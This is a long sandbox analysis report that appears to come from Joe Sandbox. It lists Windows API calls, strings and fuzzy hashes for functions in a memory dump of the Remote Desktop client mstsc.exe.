                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$AddressComputerFreeHandleLibraryMessageModuleNameProcTrace_wcsnicmpwcschr
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 940169717-0
                                                                                                                                                                                        • Opcode ID: 7efa1e961965ca2cfb02b1f2809de4af22fce51aa378bf93b65ceb3a42806997
                                                                                                                                                                                        • Instruction ID: 2ded4700804047366cc0602c15763ef647114df9ba2b3de12f40379737c0578e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7efa1e961965ca2cfb02b1f2809de4af22fce51aa378bf93b65ceb3a42806997
                                                                                                                                                                                        • Instruction Fuzzy Hash: E13126725183289FD7288F69EC59B6B7BE9EF44310F10001AE900DB2A7DB74DC509F92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptDecodeObject.CRYPT32(00000000,00000024,00000000,?,00000000,00000000,?), ref: 009340D4
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00934328,?,?,00000000,00000000,?,?,00000000), ref: 009340E5
                                                                                                                                                                                        • CryptDecodeObject.CRYPT32(00000000,00000024,00000000,?,00000000,00000000,?), ref: 009340FE
                                                                                                                                                                                        • LocalFree.KERNEL32(00934328,?,00934328,?,?,00000000,00000000,?,?,00000000), ref: 0093410A
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00934328,?,?,00000000,00000000,?,?,00000000), ref: 00934113
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptDecodeLocalObject$AllocErrorFreeLast
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1386893860-0
                                                                                                                                                                                        • Opcode ID: 4b9d5e7701d1d14a1cd2480801fda502c295dd9597f056af8b7a3d8f7fde5425
                                                                                                                                                                                        • Instruction ID: 7c06738fef23a9c101cfe210e761b532277cd14f58b139bdab33e60a3842e178
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b9d5e7701d1d14a1cd2480801fda502c295dd9597f056af8b7a3d8f7fde5425
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1501C075208606BBEB200FA1DC09F667BACEF64756F104018FA45E51A0E675E890EF64
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsIconic.USER32(?), ref: 008E8829
                                                                                                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 008E8841
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E884B
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressErrorFreeHandleIconicLastLibraryMessageModulePlacementProcTraceWindow
                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                        • API String ID: 3754642993-3772416878
                                                                                                                                                                                        • Opcode ID: b3926f13eafeb5d626fb27ae67a7de038452090d910184706516d346026dc74f
                                                                                                                                                                                        • Instruction ID: fcab24d8d8ae5f5dc67f64709aaaaa4660ae5d91e26b86c418a628af5b52ee4c
                                                                                                                                                                                        • Opcode Fuzzy Hash: b3926f13eafeb5d626fb27ae67a7de038452090d910184706516d346026dc74f
                                                                                                                                                                                        • Instruction Fuzzy Hash: B911DD71210348ABDB189F62DC09B6EBBA5FF46304F900169EC14A71A0CB30DC12DB51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsWindowVisible.USER32 ref: 008EC149
                                                                                                                                                                                        • IsIconic.USER32(?), ref: 008EC176
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleIconicLibraryMessageModuleProcTraceVisibleWindow
                                                                                                                                                                                        • String ID: ShowShutdownDialog
                                                                                                                                                                                        • API String ID: 285738821-2398949525
                                                                                                                                                                                        • Opcode ID: e3c4291d92e22a01fa023de7b9676f056bb9d66333435e7d247d5194255caf3e
                                                                                                                                                                                        • Instruction ID: e9cf468802a36741fd75b88c5f7650901839925d706ad564ccf65f130be97652
                                                                                                                                                                                        • Opcode Fuzzy Hash: e3c4291d92e22a01fa023de7b9676f056bb9d66333435e7d247d5194255caf3e
                                                                                                                                                                                        • Instruction Fuzzy Hash: C6315971A10388AFE728AF66C849B7F37A9FB47314F104429E852D7252C770EC429B11
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetSystemTime.KERNEL32(008DB55C,?,?,?,?,009343E7,008DB55C,?,?,?,00000000), ref: 0093416D
                                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(008DB55C,?,?,009343E7,008DB55C,?,?,?,00000000), ref: 0093417B
                                                                                                                                                                                        • GetLastError.KERNEL32(?,009343E7,008DB55C,?,?,?,00000000), ref: 00934185
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Time$System$ErrorFileLast
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2409880431-0
                                                                                                                                                                                        • Opcode ID: 5bf7b8bc00dd88531ccd47cf1be42dc063dfb202e53e0d07d07e69080f922bfa
                                                                                                                                                                                        • Instruction ID: 355e7cf09a3c1d50c36abc08e8cc2053ae1ca1b595a4c68e4f6e55a953162236
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bf7b8bc00dd88531ccd47cf1be42dc063dfb202e53e0d07d07e69080f922bfa
                                                                                                                                                                                        • Instruction Fuzzy Hash: AD11D07AA18A1ACBCB10DFD4CC8096AB7B8EB74320F224666D81197240D734ED809F91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoCreateInstance.OLE32(008D11B4,00000000,00000001,008D1194,?), ref: 0091B9DF
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3463782917-0
                                                                                                                                                                                        • Opcode ID: c757cc6a97ed6e7eacbb8e5ea2982a8e254217adda98a0aa55a4d5a9de57420e
                                                                                                                                                                                        • Instruction ID: 2d5592fa6b949d5feae8bc8759f421658eb56ebeddfb4b27ab19a738d21b062d
                                                                                                                                                                                        • Opcode Fuzzy Hash: c757cc6a97ed6e7eacbb8e5ea2982a8e254217adda98a0aa55a4d5a9de57420e
                                                                                                                                                                                        • Instruction Fuzzy Hash: FD51A271B14348AFDB19CF99C988FA97BAAEF09308F140098F641DB2A2C771DD819F51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 008EFC13
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 008EFCA3
                                                                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 008EFCFF
                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 008EFD13
                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,?,?,?,00000004), ref: 008EFD36
                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 008EFD40
                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 008EFD4E
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008EFD80
                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 008EFD89
                                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 008EFDAB
                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 008EFDC7
                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 008EFDD1
                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,?,?,?,0000000C), ref: 008EFE0A
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00003391), ref: 008EFE27
                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 008EFE41
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 008EFE49
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 008EFE53
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,0000000E), ref: 008EFEB5
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,0000000E), ref: 008EFED9
                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 008EFEE7
                                                                                                                                                                                        • InvalidateRect.USER32(00000000,?,00000001), ref: 008EFF3D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: RectWindow$Client$Invalidate$ItemLongVisible
                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                        • API String ID: 310215485-2766056989
                                                                                                                                                                                        • Opcode ID: 25367623a6e5807749db8b47c77792e2a17680db5511d71ce532d3d120d3657e
                                                                                                                                                                                        • Instruction ID: 733547cf4881b8f64700d2ccb44b370dc4f393279c679adeb783065522b9143f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 25367623a6e5807749db8b47c77792e2a17680db5511d71ce532d3d120d3657e
                                                                                                                                                                                        • Instruction Fuzzy Hash: FAC12872218244AFD704DF68CD88A6BBBE9FB89704F144969FA84E7256C770ED00CF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SafeArrayUnlock.OLEAUT32(00000000), ref: 00933843
                                                                                                                                                                                        • SafeArrayDestroy.OLEAUT32(00000000), ref: 0093384E
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ArraySafe$AddressDestroyFreeHandleLibraryModuleProcUnlock
                                                                                                                                                                                        • String ID: AllowSetForegroundWindow failed!$CoCreateInstance failed!$Params.SetAt failed!$bstrCommandLine$bstrRDPFileName$saParams.Create failed!$spRemoteDesktopClient->GetProcessId failed!$spRemoteDesktopClient->StartRemoteApplication failed!$spWorkspace->GetProcessId failed!$spWorkspace->StartRemoteApplication failed!
                                                                                                                                                                                        • API String ID: 2590906998-1740355100
                                                                                                                                                                                        • Opcode ID: 0dc3a08089caaecd58ab239fac9bfda1237a1a2ca6cd3142aed8c0d03de5b044
                                                                                                                                                                                        • Instruction ID: b16f30cc0bac00209bc95e623434a613675bb01e4c1d7b284d1cd0f031105a70
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dc3a08089caaecd58ab239fac9bfda1237a1a2ca6cd3142aed8c0d03de5b044
                                                                                                                                                                                        • Instruction Fuzzy Hash: 09F1C371680345AFDB19CF5AC849F2A7BEAFB89314F058058F541DB2A2C734CA81DF62
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0090B2F7
                                                                                                                                                                                        • _wtol.MSVCRT ref: 0090B365
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0090B3B5
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0090B3CC
                                                                                                                                                                                        • SetTextColor.GDI32(00000000,00993300), ref: 0090B3DE
                                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0090B3E7
                                                                                                                                                                                        • SetMapMode.GDI32(00000000,00000001), ref: 0090B3F0
                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0090B406
                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0090B440
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0090B54B
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0090B586
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0090B594
                                                                                                                                                                                        • DrawTextW.USER32(00000000,?,?,?,?), ref: 0090B5C8
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0090B5F4
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0090B65D
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0090B66F
                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0090B676
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0090B73E
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$Select$Delete$LongModeTextWindow$AddressClientColorCompatibleCreateDrawErrorFreeHandleLastLibraryMessageModuleProcRectTrace_wtol
                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                        • API String ID: 1029568502-2564639436
                                                                                                                                                                                        • Opcode ID: 6169c1cd1a23b1e582d882e04413701478c5d58713f931703c31b85c3a5e227e
                                                                                                                                                                                        • Instruction ID: 1a6ef3f21d57fadfb7f4e411b3aa0150cd2efaee865024447cbeff3498b0e05d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6169c1cd1a23b1e582d882e04413701478c5d58713f931703c31b85c3a5e227e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 68D17C71908318AFDB299F68DC88BA97BB9FF49304F144189F505A72A2CB31DD80EF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 008E510B
                                                                                                                                                                                        • CreateFileW.KERNEL32(008D0A48,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008E5154
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E5163
                                                                                                                                                                                        • CreateFileW.KERNEL32(8B55F12B,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008E51D0
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E51DF
                                                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 008E523C
                                                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 008E5245
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 008E5254
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 008E52F7
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 008E5303
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 008E5314
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 008E531B
                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 008E5337
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E5341
                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 008E5396
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E53A0
                                                                                                                                                                                        • memcmp.MSVCRT ref: 008E5400
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$ErrorLast$Local$CloseCreateFreeHandleReadSize$Alloc_wcsicmpmemcmp
                                                                                                                                                                                        • String ID: HKEY_DYN_DATA
                                                                                                                                                                                        • API String ID: 2972365698-3361149836
                                                                                                                                                                                        • Opcode ID: aed8523685bd2e3a39b56a716d6a4a8bc659a8b31f132253a7fb451ce60566aa
                                                                                                                                                                                        • Instruction ID: c12468bd2bc7d7d6bd71d063512fe49360aeb8905b6c10550c2d7ae4679669eb
                                                                                                                                                                                        • Opcode Fuzzy Hash: aed8523685bd2e3a39b56a716d6a4a8bc659a8b31f132253a7fb451ce60566aa
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6091D171214780AFDB298F66DC88F1A3BA5FB4B358F14054DFA84D72A1DA70CD409F52
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0092B1E5: memset.MSVCRT ref: 0092B20A
                                                                                                                                                                                          • Part of subcall function 0092B1E5: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0092B23A
                                                                                                                                                                                          • Part of subcall function 0092B1E5: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0092B242
                                                                                                                                                                                          • Part of subcall function 0092B1E5: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0092B24F
                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(sspicli.dll,00000000,00000000), ref: 0092902E
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00929065
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SspiUnmarshalAuthIdentity), ref: 0092908E
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 009290C1
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00929229
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$AddressConditionLibraryMaskProc$FreeHandleInfoLoadModuleVerifyVersionmemset
                                                                                                                                                                                        • String ID: SspiFreeAuthIdentity$SspiLocalFree$SspiPrepareForCredRead$SspiPrepareForCredWrite$SspiUnmarshalAuthIdentity$sspicli.dll
                                                                                                                                                                                        • API String ID: 2657807142-4078069544
                                                                                                                                                                                        • Opcode ID: 6aaeb49297407268afd406e74ffcca59fa440b155163456ff7204f554589d55a
                                                                                                                                                                                        • Instruction ID: 783bea39c0cb3b188bfafa6f4b43077450c56ce8a003c35f68bc4fba5d4fe360
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6aaeb49297407268afd406e74ffcca59fa440b155163456ff7204f554589d55a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7151F271918321BEEB298F59FE49F217B99FB09314F040149E850E72B6C760DC90EF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 008E624F
                                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 008E6268
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(USER32), ref: 008E6284
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 008E62A0
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 008E62B1
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 008E62C2
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 008E62D3
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 008E62E4
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 008E62F5
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 008E6315
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressProc$HandleModuleVersionmemset
                                                                                                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                                                        • API String ID: 1373713818-2451437823
                                                                                                                                                                                        • Opcode ID: 77a4a1ea4e6d67e581bec53841d6e671af655d144d666d1650357233ac1c1349
                                                                                                                                                                                        • Instruction ID: 759c5f7a907dc1cf13657f42aa6982bc7525877e727d896696d04b65c7cfbdbb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a4a1ea4e6d67e581bec53841d6e671af655d144d666d1650357233ac1c1349
                                                                                                                                                                                        • Instruction Fuzzy Hash: DA31A7B5638311ABC7109F769C89A2A7BE8FB59750F40012BE444D2391FF78C511EF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0091B6E6: memset.MSVCRT ref: 0091B70B
                                                                                                                                                                                          • Part of subcall function 0091B6E6: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000000), ref: 0091B739
                                                                                                                                                                                          • Part of subcall function 0091B6E6: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000000), ref: 0091B741
                                                                                                                                                                                          • Part of subcall function 0091B6E6: VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 0091B74E
                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000000), ref: 0091EB83
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RtlEqualDomainName), ref: 0091EBDC
                                                                                                                                                                                        • memset.MSVCRT ref: 0091EC8A
                                                                                                                                                                                        • memset.MSVCRT ref: 0091ECA0
                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(normaliz.dll,00000000,00000000), ref: 0091ECAF
                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0091EE79
                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0091EE84
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Library$Freememset$AddressConditionLoadMaskProc$HandleInfoMessageModuleTraceVerifyVersion
                                                                                                                                                                                        • String ID: IdnToNameprepUnicode$IdnToUnicode$RtlEqualDomainName$normaliz.dll$ntdll.dll$xn--
                                                                                                                                                                                        • API String ID: 2797081027-3313525300
                                                                                                                                                                                        • Opcode ID: 75120d7f8ea2968bf4e8e074f5f700a7e554de34f48e33832d8aa0791b3b79e1
